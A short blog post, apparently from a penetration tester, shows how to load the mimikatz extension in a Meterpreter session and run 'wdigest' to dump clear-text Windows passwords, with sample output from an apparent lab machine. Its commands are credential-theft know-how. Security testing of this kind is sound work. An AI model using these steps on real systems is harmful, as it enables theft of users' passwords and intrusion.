Finally, mimikatz has been accepted into the Metasploit trunk! This post is an update to an earlier post named Dumping Clear Text Passwords. Now, it’s easier than ever to dump clear text passwords from within a Meterpreter session. Let’s walk through an example.
At the time of this writing, “msfupdate” was not pulling down the mimikatz extension for me, so I just copied the required files to their respective locations found here. Now, once we attain a Meterpreter session, we just load the extension and call “wdigest”.
meterpreter > load mimikatz Loading extension mimikatz...success. meterpreter > wdigest [!] Not currently running as SYSTEM [*] Attempting to getprivs [+] Got SeDebugPrivilege [*] Retrieving wdigest credentials wdigest credentials ===================
AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;999 NTLM WORKGROUP VULNXP$ 0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;49975 NTLM 0;996 Negotiate NT AUTHORITY NETWORK SERVICE 0;173813 NTLM VULNXP TrustedSec SecurityMadeSimple!
Easy as pie. I can’t wait to use this on our next pentest!